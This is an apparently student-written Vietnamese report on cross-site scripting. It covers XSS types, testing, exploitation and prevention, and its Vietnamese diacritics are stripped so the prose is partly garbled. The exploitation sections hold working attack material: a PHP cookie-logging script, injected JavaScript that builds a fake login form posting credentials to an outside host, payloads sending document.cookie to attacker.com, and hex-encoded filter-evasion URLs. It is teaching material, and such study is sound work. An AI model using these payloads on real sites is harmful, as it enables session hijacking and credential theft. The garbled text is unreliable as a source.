HC VIN CNG NGH BU CHNH VIN THNG

C S TP.HCM

AN NINH MNG

BO CO TI MN HC AN NINH MNG

K THUT TN CNG XSS

Ging vin hng dn : ThS. L PHC

Sinh vin thc hin : TRN NH NGC
MSV: 407170045
Lp : D07THM1

AN NINH MNG

Mc lc
I. GII THIU CHUNG ................................................................................................. 4
II. GII THIU V XSS ................................................................................................. 5
1. Tm hiu XSS ........................................................................................................... 5
2. Hai hnh thc tn ti ca XSS .................................................................................. 5
2.1. Stored XSS ......................................................................................................... 5
2.2. Reflected XSS .................................................................................................... 6
3. Mc nguy him ca XSS..................................................................................... 7
4. Mc tiu m XSS hng ti. .................................................................................... 8
III.HOT NG CA XSS ........................................................................................... 9
IV.CNH GIC VI XSS ............................................................................................ 12
V. KIM TRA LI XSS ............................................................................................... 14
1. S dng Tool .......................................................................................................... 14
2. Th bng Code ....................................................................................................... 14
VI. KHAI THC LI XSS ........................................................................................... 16
1.Tm tt cc bc thc hin ..................................................................................... 17
2. Cc cch thc hin.................................................................................................. 18
2.1. Nghin cu cch ly cookies: .......................................................................... 18
2.2.Nghin cu cch ly account. ........................................................................... 18
2.3. Tn Cng XSS Bng Flash .............................................................................. 19
3. Attacker dng XSS la o ............................................................................... 22
4. Cch vt qua c ch lc k t .............................................................................. 22

AN NINH MNG

VII. PHNG CHNG XSS........................................................................................... 23

1. Vi nhng d liu ngi thit k v pht trin ng dng Web ........................... 23
2. i vi ngi dng. ............................................................................................. 26
VIII. PHM VI V TNH KH THI CA PHNG PHP TN CNG BNG XSS
........................................................................................................................................ 27
IX. NH GI .............................................................................................................. 27
TI LIU THAM KHO: ............................................................................................ 28

AN NINH MNG

I. GII THIU CHUNG

Website ngy nay rt phc tp v thng l cc web ng, ni dung ca web
c cp nht thng qua cc thnh vin tham gia khp mi ni trn th gii. V
hu ht cc website ny dng Cookie xc thc ngi dng.
iu ny ng ngha vi vic Cookie ca ai th ngi dng, Nu ly c
Cookie ngi dng no Hacker s gi mo c chnh ngi dng (iu ny l ht
sc nguy him). Vy lm sao cc hacker c th ly cookie ca bn? C rt nhiu
cch cc hacker lm vic , y ti xin trnh by mt trong nhng cch m
hacker thng dng, chnh l h nh vo li Cross Site Scripting(XSS).
Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht
hin nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi
cc nh pht trin web v c nhng ngi s dng web. Bt k mt website no cho
php ngi s dng ng thng tin m khng c s kim tra cht ch cc on m
nguy him th u c th tim n cc li XSS.
XSS c thc hin trn cc th JavaScript, v cc th JavaScript chng c th lm
c nhng cng vic sau:
1. Thay i cu trc ca ton b trang web.
2. To ty cc phn t HTML.
3. nh tuyn li cc hnh thc lin kt
4. Phc hi d liu, xc thc
5. Gi v nhn d liu
6. c cc t hp phm.

AN NINH MNG

II. GII THIU V XSS

1. Tm hiu XSS
Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh
nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng cch
chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng on
m script nguy him c kh nng nh cp hay thit lp c nhng thng tin quan
trng nh cookies, mt khu, usename. Trong , nhng on m nguy him c
chn vo hu ht c vit bng cc Client-Site Script nh JavaScript, JScript, DHTML
v cng c th l c cc th HTML.
Phng php ny khng nhm vo my ch h thng m ch yu tn cng trn chnh
my ngi s dng. Hacker s li dng s kim tra lng lo t ng dng v hiu bit
hn ch ca ngi dng cng nh bit nh vo s t m ca h dn n ngi dng b
mt thng tin mt cch d dng.
Thng thng hacker li dng a ch URL a ra nhng lin kt l tc nhn kch
hot nhng on chng trnh c vit bng ngn ng my khch nh VBScript,
JavaScriptc thc thi trn chnh trnh duyt ca nn nhn

2. Hai hnh thc tn ti ca XSS

2.1. Stored XSS
Stored XSS l hnh thc tn cng m cho php k tn cng c th chn
mt on script nguy him (thng l Javascript) vo website ca chng ta thng
qua mt chc nng no (vd: vit li bnh, guestbook, gi bi..), t khi cc
thnh vin khc truy cp website s b dnh m c t k tn cng ny, cc m c
ny thng c lu li trong database ca website chng ta nn gi l Stored.
Stored XSS pht sinh do chng ta khng lc d liu do thnh vin gi ln mt cch
ng n, khin cho m c c lu vo Database ca website.

AN NINH MNG

2.2. Reflected XSS

Trong hnh thc ny, k tn cng thng gn thm on m c vo URL ca
website chng ta v gi n nn nhn, nu nn nhn truy cp URL th s b dnh
m c. iu ny xy ra do ta khng ch filter input t URL ca website mnh.

AN NINH MNG

Tn cng XSS l tn cng nguy him, cho php k tn cng n cp thng tin trn
my nn nhn thng qua javascript nh n cp cookie, chn m c chin quyn
iu khin
XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li
ny, chnh v th ngy cng c nhiu ngi quan tm n li ny.
Gn y, theo Brian Krebs ca t Washington Post bo co rng hng ngn trang web
khng an ton c xc nh vo nm ngoi, v trang Xssed.com a ra danh sch
gn 13.000 trang trong c nhiu l hng cross-site scripting (XSS).
V d 1: Mt on url m hacker chn Script vo ly cookie ca ngi dng.
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_te
xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

3. Mc nguy him ca XSS

Theo thng k v cc l hng bo mt thng b tn cng nht vo nm 2009

AN NINH MNG

Cross-Site Scripting (XSS) chim mt t l rt cao so vi cc phng php tn cng

khc.
K thut XSS c m t ln u tin cch y 5 nm (t nm 2007 n 2011) v hu
ht cc kh nng tim n ca k thut ny c bit n. Tuy nhin chng ta mi
ch khc phc c mt phn ca n. Khng phi v tnh m Yahoo Mail li st
mt li XSS trong b lc ca mnh. Mt phng php ti u vn cn ang pha
trc.
4. Mc tiu m XSS hng ti.
XSS khai thc thng c s dng t c cc kt qu c hi sau y:

* Truy cp thng tin nhy cm hoc b hn ch

* n cp tin (giao dch ngn hng, mua hng online.)
* Theo di thi quen lt web ca ngi dng
* Thay i nng ca trnh duyt
* Bi nh danh ting ca mt c nhn hay cng ty
* Hy hoi ng dng Web.
* Tn cng t chi dch v
...

AN NINH MNG

III.HOT NG CA XSS
XSS cho php attacker chn cc on m vo link ca ng dn, thc hin
trn trnh duyt ca ngi dng, dn n vic mt cookies, mt khu, session hay
chn virus
Thng th XSS c dng nh sau:
http://www.xxx.vn//index.php?pg=news&cat=<script>alert(Li XSS)</script>.
V ni dung xut hin trn trnh duyt l mt ci popup c thng tin l Li XSS.
trn v d 1 trn ch minh ha mt cch n gin l thm on m ca mnh vo
trang Web thng qua URL. Nhng thc s th c rt nhiu cch thm
on m JavaScript vi mc ch tn cng kiu XSS. Hacker c th d dng
li dng Document Object Model (DOM) thay i ng cnh v ni dng Web
ng dng.
V d 2: Sau y l danh sch ni c th chn on m:
<a href= "javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<lin kt rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">

AN NINH MNG

10

<div style="background-image: url(javascript:[code]);">

<div style="behaviour: url([lin kt to code]);">
<div style="binding: url([lin kt to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>

(ti liu t http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-0515/0)

Phn in m l phn c th t on m nh cp thng tin.
V c bn XSS cng ging nh SQL Injection hay Source Injection, n cng l
cc yu cu (request) c gi t cc my client ti server nhm chn vo cc
thng tin vt qu tm kim sot ca server
N c th l mt request c gi t cc form d liu hoc cng c th ch l cc
URL nh l :
http://www.example.com/search.cgi?query=<script>alert('XSS was found
!');</script>
V rt c th trnh duyt ca bn s hin ln mt thng bo "XSS was found !".
Cc on m trong th script khng h b gii hn bi chng hon ton c th
thay th bng mt file ngun trn mt server khc thng qua thuc tnh src ca th
script. Cng chnh v l m chng ta cha th lng ht c nguy him ca
cc li XSS.
Nhng nu nh cc k thut tn cng khc c th lm thay i c d liu
ngun ca web server (m ngun, cu trc, c s d liu) th XSS ch gy tn hi i

AN NINH MNG

11

vi website pha client m nn nhn trc tip l nhng ngi khch duyt site .
Tt nhin i khi cc hacker cng s dng k thut ny deface cc website nhng
vn ch tn cng vo b mt ca website.
Tht vy, XSS l nhng Client-Side Script, nhng on m ny s ch chy bi
trnh duyt pha client do XSS khng lm nh hng n h thng website nm
trn server.
Mc tiu tn cng ca XSS khng ai khc chnh l nhng ngi s dng khc
ca website, khi h v tnh vo cc trang c cha cc on m nguy him do cc
hacker li h c th b chuyn ti cc website khc, t li homepage, hay nng
hn l mt mt khu, mt cookie thm ch my tnh bn c th s b ci cc loi virus,
backdoor, worm ...
Trong k thut XSS thng th cc link m hacker dng u c m ha nn
ngi dng kh m pht hin ra. Sau y l cch m ho(HEX) cc k t thng
dng trong li XSS ca thanh AddressBar ca Browser.

AN NINH MNG

12

V d 3: Mt a ch c m ha HEX.
http://vieclambank.com/search.php?s=">%3C%73%63%72%69%70%74%20%73%
72%63%25%33%44%68%74%74%70%25%33%41%25%32%46%25%32%46%6A
%73%6E%67%6F%63%2E%76%6E%6E%2E%6D%73%25%32%46%78%73%73
%2E%6A%73%3E%3C%25%32%46%73%63%72%69%70%74%3E
IV.CNH GIC VI XSS
C l khng cn lit k nhng nguy him ca XSS, nhng trn thc t nu bn
c mt cht hiu bit v XSS bn s khng cn phi s chng na. Tht vy bn
hon ton c th trnh khi vic b tn cng bi nhng li XSS nu hiu k v n.
Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut XSS,
trong 2 th IMG v IFRAME c th cho php trnh duyt ca bn load thm cc
website khc khi cc lnh HTML c hin th. V d nh BadTrans Worm mt loi
worm s dng th IFRAME ly lan trong cc h thng c s dng Outlook hay
Outlook Express:
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====---====_ABC1234567890DEF_====

AN NINH MNG

13

Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
i khi ang c th bn b chuyn sang mt website khc, bn c ngh rng
bn c th mt mt khu. Trc y, hng lot cc hp th ca Yahoo b mt mt
khu hay b c trm th m khng r nguyn nhn. C l khi cc bn m cc bc
th m khng h cnh gic vi XSS, u phi ch cc file nh km mi c th gy
nguy him cho bn. Ch cn vi mt on m HTML gi trong th bn hon ton
b mt cookie ca mnh:
<form action="http://attacker.com/save.asp" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value =
document.cookie; window.document.XSS.submit();" src="none.jpg">
Vy l khi bn nhn th, v nu bn v tnh a con chut qua bc nh gi km
th cng c ngha l bn b ly mt cookie. V vi cookie ly c, cc hacker c
th d dng login hm th ca bn m khng cn bit mt khu ca bn. Thc s ti
cng rt bt ng khi tm thy rng Yahoo khi ngn c hu ht cc mi e
do t cc th HTML li b qua th IMG. Tuy nhin cho ti ngy 12/7/2003 Yahoo
kp thi v l hng nghim trng ny, nhng khng phi v vy m bn mt cnh
gic vi nhng "li" ca website. Nu nh bn gp mt lin kt c dng:
http://example.com/s...document.cookie)</script>
Chc chn bn s phi xem xt k trc khi click vo. C th l s tt JavaScript
cho trnh duyt ca bn trc khi click vo hay t nht cng c mt cht cnh gic.
Nhng nu bn gp mt lin kt nh th ny th sao:
http://example.com/s...72%79%3D<script>

AN NINH MNG

14

thc cht chnh l lin kt ban u nhng ch khc n c m ho. Mt

phn k t ca lin kt c thay th bi m HEX ca n, tt nhin trnh duyt ca
bn vn hiu a ch thc s l g. Bi vy bn c th s gp phi cc on m
nguy him nu nh bn mt cnh gic vi XSS.
Tt nhin cn rt nhiu nhng kiu tn cng khc, trong c nhng kiu
c tm ra c nhng kiu cha lng ht c, nhng trong khun kh bi vit ny
ti hi vng vi mt vi v d va ri, cc bn cng hiu phn no v XSS.
V. KIM TRA LI XSS
Nu nh cc bn s dng cc m ngun ca cc chng trnh c sn bn
c th tham kho danh sch cc l hng ca chng trnh bn trn cc trang web
cha cc thng tin v bo mt nh securityfocus.com, securiteam.com... Tuy nhin
nu cc website c t vit m ngun th bn khng th p dng phng php trn.
Trong trng hp ny bn cn n cc chng trnh scanner t ng. Nu nh bn s
dng trong mi trng Windows bn c th dng N-Stealth hay AppScan, l
nhng chng trnh scan kh tuyt, bn khng ch kim tra c cc li XSS m n
cn cho php bn kim tra cc li khc trong Website , Server .
Tt nhin u phi lc no bn cng cn kim tra tt c, nu nh bn ch mun kim
tra cc li XSS c trong website, bn ch cn s dng screamingCSS. l mt Perl
Script s m cc kt ni ti website (s dng Perl's socket) kim tra cc li XSS
ca bn. Hn na bn c th s dng n trong c mi trng Unix ln Windows.
V chng ta c th a ra hai cch chnh sau:
1. S dng Tool
S dng nhiu chng trnh d qut li ca ng dng web, v d nh chng
trnh Web Vulnerability Scanner d qut li XSS.
2. Th bng Code
Thc hin 5 bc:
Bc 1: M website cn kim tra
Bc 2: Xc nh cc ch (phn) cn kim tra XSS. 1 Site bt k bao gi cng c

AN NINH MNG

15

cc phn: Search, error message, web form. Ch yu li XSS nm phn ny, ni

chung XSS c th xy ra ch no m ngi dng c th nhp d liu vo v sau
nhn c mt ci g . V d chng ta nhp vo chui XSS
Bc 3: Xc minh kh nng site c b li XSS hay khng bng cch xem cc
thng tin tr v. V d chng ta thy th ny: Khng tm thy XSS , hay l
Ti khon XSS khng chnh xc, ng nhp vi XSS khng thnh cng th
khi kh nng ch b dnh XSS l rt cao.
Bc 4: Khi xc nh ch c kh nng b dnh li XSS th chng ta s chn
nhng on code ca chng ta vo th tip, v d nh sau:
Chn on code ny: < script>alert('XSS')< /script> vo b li v nhn nt
Submit, nu chng ta nhn c mt popup c ch XSS th 100% b dnh XSS.
Ta c th nhp vo form li cc th sau:
<script>alert('CSS Vulnerable')</script>
<i*g csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable') };
<script>window.open( http://www.google.com/ )</script>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');">
<EMBED SRC="http://ha.ckers.org/xss.swf"
AllowScriptAccess="always"></EMBED>
V d 4: Thng bo cho bit chc chn web b li XSS.

AN NINH MNG

16

Nhng xin ch , thnh thong vn c trng hp website b dnh XSS

nhng vn khng xut hin ci popup th buc lng bn phi VIEW SOURCES
(m bng) n ra xem .
Khi view sources nh kim dng ny < script>alert('XSS)< /script> , nu c
th chc chn l website li XSS 100%.
Gi http://websitebiloi.com/ l site b dnh li XSS v ta tm c ni b li nh
th ny : http://websitebiloi.com/index.php?page=<script...< script=""> ngha l
ta c th chn code ngay trn thanh ADDRESS.
Bc 5: Ln k hoch kch bn tn cng

VI. KHAI THC LI XSS

Khc vi cc li khc l gy hi trc tip ln h thng cha web site, cn XSS li
khng gy hi n h thng ca sever m i tng tn cng ch yu ca XSS li l
ngi dng!
ng dng Web thng lu tr thng tin quan trng cookie. Cookie l mu thng
tin m ng dng lu trn a cng ca ngi s dng. Nhng ch ng dng thit lp
ra cookie th mi c th c n. Do ch khi ngi dng ang trong phin lm vic
ca ng dng th hacker mi c c hi nh cp cookie. Cng vic u tin
ca hacker l tm trang ch d ngi dng ng nhp sau khi tm ra l hng
trn ng dng .
Sau y l cc bc khai thc XSS theo truyn thng:

AN NINH MNG

17

1.Tm tt cc bc thc hin

Bc 1: Hacker bit c ngi dng ang s dng mt ng dng Web c l
hng XSS.
Bc 2: Ngi dng nhn c 1 lin kt thng qua email hay trn chnh trang Web
(nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to ra).
Thng thng hacker khin ngi dng ch bng nhng cu kch thch s t m ca
ngi dng nh Kim tra ti khon, Mt phn thng hp dn ang ch bn
Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch
ca hacker.
Bc 4: Hacker to mt chng trnh cgi ( v d 3 ny l steal.cgi) hoc mt
trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin
Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm
nhp vo ti khon ca ngi dng.

AN NINH MNG

18

2. Cc cch thc hin

hiu r hn v cc tn cng XSS chng ta xem xt v d thc t sau:

2.1. Nghin cu cch ly cookies:

Th nht: Bn hy to mt file info.txt v upload ln host ca bn.
Th hai: To file cookie.asp hoc cookie.php c ni dung sau v upload file
ny ln host ca bn nh sau:
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADD');
$date = date("j F, Y, g:i, a");;
$referer = getenv('HTTP_REFERER');
$fp = fopen('info.txt','a');
fwrite($fp,'Cookie: '.$cookie. 'IP:' .$ip. 'date:' .$date. 'Referer: '.$referer.' ');
fclose($fp);
header("location: http:// hostxss.com /");
?>
Th ba: Trn nhng phn tr li hay gp trn din n hoc email hoc website
(b li XSS) chng ta mt link c li gii thiu hay thng bo gy ch (c
hostname l ca trang web b nhim XSS) dng nh sau :
http:// hostxss.com /search.cgi?query=<script>alert(document.cookie)</script>
hoc http:// hostxss.com /search.cgi?%71%75...72%69%70%74%3E ( c m
ha)
2.2.Nghin cu cch ly account.
Th nht: Bn hy to mt file info.txt v upload ln host ca bn.
Th hai: To thm mt file xss.js v cng upload file ny ln host ca bn:
File ny l to ra mt facesite (trang web gi ging trang web tht)
khi ngi dng nhp username v password th chng ta s iu hng v
lu thng tin trn file info.txt.

AN NINH MNG

19

document.body.innerHTML=
<img src=images/system/logo_main.gif alt=VieclamBank width=230 height=48
border=0>
<BR><br><br>
<center>Thng tin ng nhp<BR>
<form action=http://www.hostupfile.com/cookie.php
method=POST><table><TR><TD>Tn ng nhp:</TD><TD><input
name=ten></TD></TR><TR><TD>Mt khu:</TD><TD><input name=mk
type=password></TD></TR><TR><TD></TD><TD><input type=submit
value=Login></TD></TR></table></form>
</center>'
Th ba: Chng ta mt link c li gii thiu hay thng bo gy ch (c
hostname l ca trang web b nhim XSS) . Khi to mt link dng nh sau v
gi mail hay up link ln trang web c nhim XSS: (sau hostname ta thm th Script
vo)
http:// hostxss.com /search.php?s="> <script
src%3Dhttp%3A%2F%2Fjsngoc.vnn.ms%2Fxss.js><%2Fscript>
Khi bn pha ngi dng s c mt trang web gi mo(face site): Ngi
dng khng pht hin ra v khi ng nhp th cookie hay usename v password s
c lu li trong file info.txt trn server ca hacker.

2.3. Tn Cng XSS Bng Flash

Ngoi nhng cch a mt on m nguy him th hacker cn c th li dng
nhng tp tin flash nh cp thng tin.
Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy
dng sn trong Flash l ActionScript. ActionScript c c php n gin v tng t
nh JavaScript, C hay PERL. V d hm getURL() dng gi mt trang web
khc, tham s thng l mt URL chng hn nh http://www.yahoo.com.
V d 5: getURL(http://www.yahoo.com)
Tuy nhin c th thay th URL bng JavaScript:
getURL(javascript:alert(document.cookie))

AN NINH MNG

20

V d trn s lm xut hin bng thng bo cha cookie ca trang web cha tp
tin flash . Nh vy l trang web b tn cng, bng cch chn mt on
JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v
cch tn cng ny l: y l on lnh trong tp tin flash v s c thi hnh khi
tp tin flash c c:
getURL(javascript:location(http://www.attacker.com?newcookie=+do
cument.cookie))
Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay
lp tc cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.

Cch vit Action Scipt trong Flash

DeviantArt l mt trang web ni ting, cho php thnh vin ca n gi cc tp
tin flash ln cho mi thnh vin cng xem. V th hacker c th n cp cookie ca
cc thnh vin v cng c th l ti khon ca ngi qun tr web, bng cch ng
k lm thnh vin ca ng dng Web ny, gi tp tin flash ln my ch v i cc
nn nhn xem tp tin flash . Di y l a ch lin kt dn mt tp tin flash nh
trnh by trong v d trn.
http://www.deviantart.com/deviation/1386080
Ngoi ra cc trang web cho php thnh vin gi d liu dng HTML nh din
n, cc chc nng to ch k ring, cng c th l mc tiu ca cch tn cng
ny, bng cch nhp on m gi tp tin flash vo.
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flas

AN NINH MNG

h/s
wflash.cab#version=6,0,0,0"
WIDTH="60"
HEIGHT="48"
id="1"
ALIGN="">
<PARAM NAME=movie
VALUE="http://www.ke_tan_cong.com/vidu.swf">
<PARAM NAME=quality VALUE=high>
<PARAM NAME=bgcolor VALUE=#FF9900>
<EMBED src=" http://www.ke_tan_cong.com/vidu.swf"
quality=high
bgcolor=#FF9900
WIDTH="60"
HEIGHT="48"
NAME="1"
ALIGN=""
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>

21

AN NINH MNG

22

3. Attacker dng XSS la o

Ngoi vic ly cookies, cc attacker cn c th hng trnh duyt ca ngi dng
n trang web m Attacker thit k sn!
Sau khi attacker c thng tin v li XSS, h c th dng IFRAME, code nh sau:
<br /><br /><div class="code"><iframe src="'http://www.attacker.com'"
width="'1'" height="'1'" style="'visibility;"></iframe></div><br /><br />
( on ny dng m 1 trang web m ngi khng bit!)
<br /><br /><div class="code"><meta equiv="Refresh"
content="0;url=http://www.attacker.com"></div><br /><br />

Ngoi ra bn hon ton c th dng hm open, close window chuyn hng web
sang mt trang web khc bn mun.
Cn cch ny hay hn : Dng hm write. In ra mt th div t rng l 1024, cao
800. possion : absulitly, left=0, top=0. Nh vy l ci div va to s che ton b mn
hnh, th l ngi dng vo trang la o ca cc attacker!
Attacker c th li dng li ny fishing trn cc H thng thanh ton, game,
shopping, Ngn hng, Tn dng... hoc l chn virus!
4. Cch vt qua c ch lc k t
Nhiu coder khn kho lc ht cc k t c bit nh ' hay + trnh cc vic chn
lnh trn URL tn cng SQL hay XSS nhng mt attacker cao tay s d dng gii
quyt vic ny bng cch s dng m ha HEX thay th khai thc
----------------------------------Hex Usage:
http://www.sitebiXSS.com/a.php?variable=%22%3e%3c%73%63%72%69%70%
74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%

AN NINH MNG

23

3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63
%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%6
3%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%
65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72 %69%70%74%3e
--------------------------------link site chuyn i sang s HEX:
http://www.swingnote.com/tools/txt2hex.php hoc http://ha.ckers.org/xss.html
VII. PHNG CHNG XSS

Nh cp trn, mt tn cng XSS ch thc hin c khi gi mt trang

web cho trnh duyt web ca nn nhn c km theo m script c ca k tn cng.
Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng
qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn
ny. OWASP (The Open Web Application Standard Project) ni rng c th
xy dng cc website bo mt cao m bo nhng trang pht sinh ng khng
cha cc tag ca script, i vi cc d liu ca ngi s dng bn nn lm nhng
vic sau:
1. Vi nhng d liu ngi thit k v pht trin ng dng Web
Nhng d liu, thng tin nhp ca ngi dng, ngi thit k v pht trin ng
dng Web cn phi thc hin vi bc c bn sau:
Ch chp nhn nhng d liu hp l.

AN NINH MNG

24

T chi nhn cc d liu hng.

Lin tc kim tra v thanh lc d liu.
To ra danh sch nhng th HTML c php s dng, xa b th <script> hoc
ng cc th Script trong th <comment> coi on Script nh l mt on
trch dn thi.
Lc ra bt k mt on m JavaScript/Java/VBScript/ActiveX/Flash Related
Lc du nhy n hay kp
Lc k t Null
Xa nhng k t > , < hoc Output Encoding cc dng nh sau
< &lt;

> &gt;

( &#40;

) &#41;

# &#35;

& &#38;

Vn cho php nhp nhng k t c bit nhng s c m ha theo chun ring

M ha
Li XSS c th trnh c khi my ch Web m bo nhng trang pht sinh
c m ha (encoding) thch hp ngn chy chy cc script khng mong
mun.
M ha pha my ch l mt tin trnh m tt c ni dung pht sinh ng s i
qua mt hm m ha ni m cc th script s c thay th bi m ca n.
Ni chung, vic m ha(encoding) c khuyn khch s dng v n khng yu
cu bn phi a ra quyt nh nhng k t no l hp l hoc khng hp l.Tuy
nhin vic m ha tt c d liu khng ng tin cy c th tn ti nguyn v
nh hng n kh nng thc thi ca mt s my ch
Tuy nhin trn thc t, mt s trng hp bn phi chp nhn mi loi d liu
hay khng c mt b lc ph hp. Chnh v vy bn phi c nhng cch ring
gii quyt.
Mt trong nhng cch hay s dng l bn m ho cc k t c bit trc khi
in ra website, nht l nhng g c th gy nguy him cho ngi s dng. Trong

AN NINH MNG

25

trng hp ny th script s c i thnh script. Nh vy n s vn c in

ra mn hnh m khng h gy nguy him cho ngi s dng.
Ti ly v d vi script search.cgi vi m ngun l:
#!/usr/bin/perl
use CGI;
my $cgi = CGI->new();
my $query = $cgi->param('query');
print $cgi->header();
print "You entered $query";
y hon ton l mt script c li bi v n in ra trc tip d liu c nhp
vo. D nhin l khi in ra, n s in ra di dng on m HTML, nh th n khng
ch khng in ra chnh xc nhng d liu vo mt cch trc quan m cn c tim n
li XSS.
Nh ni trn, c th gii quyt vn ny, chng ta c th m ho cc k t
c bit ca HTML vi hm HTML::Entities::encode(). Nh vy ta c th c mt
m ngun hon ho hn nh sau:
#!/usr/bin/perl
use CGI;
use HTML::Entities;
my $cgi = CGI->new();
my $text = $cgi->param('text');
print $cgi->header();
print "You entered ", HTML::Entities::encode($text);

Tt nhin vi phng php ny bn cng c th p dng i vi cc ngn ng

Web Application khc (ASP, PHP...). kim tra vic lc v m ho d liu trc
khi in ra, cc bn c th dng mt chng trnh c vit bng ngn nh PHP, c
bit n c thit k phng chng cc li XSS. Bn c th ly m ngun chng

AN NINH MNG

26

trnh t http://www.mricon.co.../phpfilter.html Lc v m ho cc d liu cho vn l

cch tt nht chng XSS nhng nu bn ang s dng mod_perl trn Apache
Server th bn c th dng ngay module Apache::TaintRequest. Khi m ngun
chng trnh s c dng:
use Apache::TaintRequest;
my $apr = Apache::TaintRequest->new(Apache->request);
my $text = $apr->param('text');
$r->content_type("text/html");
$r->send_http_header;
$text =~ s/[^A-Za-z0-9 ]//;
$r->print("You entered ", $text);

2. i vi ngi dng.
Cn cu hnh li trnh duyt nhc nh ngi dng c cho thc thi ngn ng
kch bn trn my ca h hay khng? Ty vo mc tin cy m ngi dng s
quyt nh
Dng Firefox: C th ci thm tin ch(Add-on Firefox) YesScript - kim
sot script t web
Dng IE th ta c th vo Options/Setting /..chng ta Disable Script.
Tng t vi Google Chrome v cc trnh duyt khc.
Khi chng ta vo mt trang web mi th ta cn phi cn nhc khi click vo cc
link, v vi email chng ta cn phi kim tra cc link hay nhng hnh nh qung
co tht k. V tm li chng ta s an ton hn khi c s cnh gic cao hn.

AN NINH MNG

27

VIII. PHM VI V TNH KH THI CA PHNG PHP TN CNG BNG XSS

M JavaScript c c th truy cp bt c thng tin no sau y:

Cookie c nh (ca site b li XSS) c duy tr bi trnh duyt.
RAM Cookie (ca site b li XSS)
Tn ca tt c cc ca s c m t site b li XSS
Bt c thng tin m c th truy cp c t DOM hin ti (nh value, m
HTML)
Trong thi gian va qua ta thy rng phng php tn cng vo li XSS ca cc
trang web vn nm con s rt cao ch sau SQL Injection. Cho nn phng php
tn cng XSS vn c coi nh l rt kh thi thc hin v vic tn cng vn cn
rng ri.
IX. NH GI

Cc him ha trong mi trng Internet

K thut XSS kh ph bin v d dng p dng, v mc thit hi ca chng

c th gy nhng hu qu rt nghim trng. V th, ngoi vic ng dng kim tra

AN NINH MNG

tnh ng n ca d liu trc khi s dng th vic cn nht l ngi dng nn

cnh gic trc khi bc vo mt trang Web mi hay khi nhn c mt email rt
thu ht no . C th ni, nh vo s cnh gic ca ngi dng th 90% t
c s bo mt trong k thut ny.

TI LIU THAM KHO:

1. Security - 2009 - Network security guide COMPTIA
2. Security - 2010 - 7 deadliest attacks - Web app
3. Bo v mt website Nhm SV H Bch Khoa TP.HCM
4. http://ha.ckers.org/xss.html
5. http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html
6. http://vibe.vn/threads/35350/
7. https://www.owasp.org/index.php/XSS

28